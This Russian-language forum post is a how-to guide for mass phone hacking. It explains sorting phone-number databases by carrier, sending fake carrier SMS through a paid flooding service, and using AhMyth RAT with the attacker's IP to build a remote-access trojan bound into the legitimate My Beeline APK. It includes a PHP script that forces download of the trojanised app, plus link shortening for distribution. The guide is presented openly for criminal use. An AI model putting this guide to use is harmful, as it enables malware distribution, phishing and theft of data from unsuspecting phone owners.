Добрый день, дорогие форумчане. Сегодня я хочу разобрать такую тему как массовый взлом. Да, это будет не так просто, но интересно. Поэтому без лишних слов приступим к делу.
План работы и схема
И так, давайте рассмотрим наш план действий:
Представим такую ситуацию. Каждый из нас знает, что операторы связи (Билайн, Теле2, МТС и др) рассылают своим пользователям частенько обычные сообщения. Это может быть реклама или сообщения о том, что закончился тот же мобильный интернет. Было? Вот в один из таких случаев жертве приходит сообщение. В нем указано, что-то связанное с новым приложением или программой от разработчиков. Как это все делать на примере я покажу ниже. Он как неопытный пользователь решает его скачать. Вот тут то и запахло жареным. Нет, он не обнаружит вшитый вирус. Просто его данные уже будут не его. Теперь рассмотрим туже ситуацию только со стороны хакера. Это будет в разделе практики.
Практика
Вот здесь давайте рассмотрим подробности нашей работы. Для начало берем базу телефонов. Я дам вам две базы, а дальше фильтруйте сами, я только покажу как.
Берем все базы здесь:
Чтобы определить нужного вам оператора связи берем начало номера телефона. Допустим +79602345678. После семерки идет наш оператор. Все они приведены ниже:
Билайн: диапазон от 903 до 909 (старый), от 960 до 976 (новый).
МТС: диапазон от 910 до 919 (старый), от 980 до 989 (новый).
Теле2: отдельные номера 900, 901, 902, 908, 953, 958, 904, 950, 951, 952, 991, 992, 993-999.
Мегафон: диапазон от 920 до 928 (старый), от 929 до 937 (новый).
И так. Для тех кто не понял. Берете базу выше. И ищите нужного вам оператора по диапазонам. То есть если к примеру после +7 идет 902 то у данного номера оператор связи Теле2. Надеюсь я объяснил доходчиво. Идем дальше.
Теперь нам нужно как-то разослать сообщение примерно такого типа:
Я объясняю на примере Билайн. Дальше уже подбирайте сами. Просто меняйте название Beeline на нужное вам и все. Теперь переходим
Ссылка скрыта от гостей
. 
Здесь у нас услуга подмены номера. Но нам нужна именно рассылка сообщений. Думаю как действовать разберетесь. Для начало переходите в регистрацию и выбираете Аккаунт для флуда (здесь придется заплатить). После скачиваете софт. Но для получения пароля от архива придется потрудиться. Думаю вы разберетесь. Двигаем к созданию нашего вируса. Я работал на Windows, поэтому использовал программу с названием AhMyth RAT. Думаю вы о ней знаете. Идем сюда и скачиваем нашу заветную программу. Потом запускаем. И в открывшейся вкладки видим это:
И так. Вводим порт 42474 (можно и без этого конечно) и кликаем Listen. Теперь переходим во 2 вкладку. Там мы в Source IP вводим наш IP адрес. Да, здесь уже показывали подробную инструкцию по эксплуатации данного софта, но все же я повторюсь. IP нам потребуется внешний. Не локальный. Узнать его можно
Ссылка скрыта от гостей
. Данный сайт успешно себя зарекомендовал, поэтому советую использовать именно его. Теперь после этой всей мути нам нужно склеить наш маленький вирус с программой. Нужно официальное приложения. К примеру тот же My Beeline. Надеюсь вы поняли, что искать. После загружаем программу себе на комп, а именно apk'а файл и кликаем Bind With Another Apk. Там ищете свою программу и склеиваете с вирусом . Так, объясняю сразу. Могут возникнуть проблемы с софтом. Если у вас не работает AhMyth Rat, то в большинстве случаев это происходит из-за необновленной версии Java или вообще ее отсутствие. Чтобы это решить идете на
Ссылка скрыта от гостей
. И скачиваете. После переустанавливаете прогу и все по новой. Как наш файл приготовится нужно обзавестись хостингом. Кто не хочет платить идете
Ссылка скрыта от гостей
и используете временную бесплатную версию от RegRu. Создаете автоматическую загрузку файла на устройство жертвы. Как? Все делаете легко и просто.Создаем PHP файл. Открываем его через блокнот и пишем это:
PHP:
<?php
header("Content-disposition: attachment; filename=названия файла.apk");
header("Content-type: application/octet-stream");
header("Content-Description: File Transfer");
readfile("путь к файлу");
?>Заливаете на сайт и все. Если не получилось попробуйте залить наш вирус на сайт и указать в readifile ссылку как путь к файлу расположенный на нашем сайте (https://путь к файлу/). Теперь дело за малым. А именно распространения. Перед этим мы берем нашу готовую ссылку на сайт с автозагрузкой и сокращаем ее. Вот вам три сайта для этого дела:
1.
Ссылка скрыта от гостей
2.
Ссылка скрыта от гостей
3.
Ссылка скрыта от гостей
Использовать можете какой угодно. После просто вводите эту ссылку в сообщения для флуда. Его я оставил выше. Надеюсь объяснил понятно и просто.
Вывод
Вот таким не хилым способом можно провести массовый взлом телефонов. Сказать, что очень сложно нельзя, но все же легким это тоже не назовешь. Здесь все зависит от жертвы. Насколько она умна, чтобы ввестись на такое. Да, все сайты представленные мною не являются рекламой. Я использую их сам. Ну а на этом у меня все. Удачи
Последнее редактирование модератором:
?
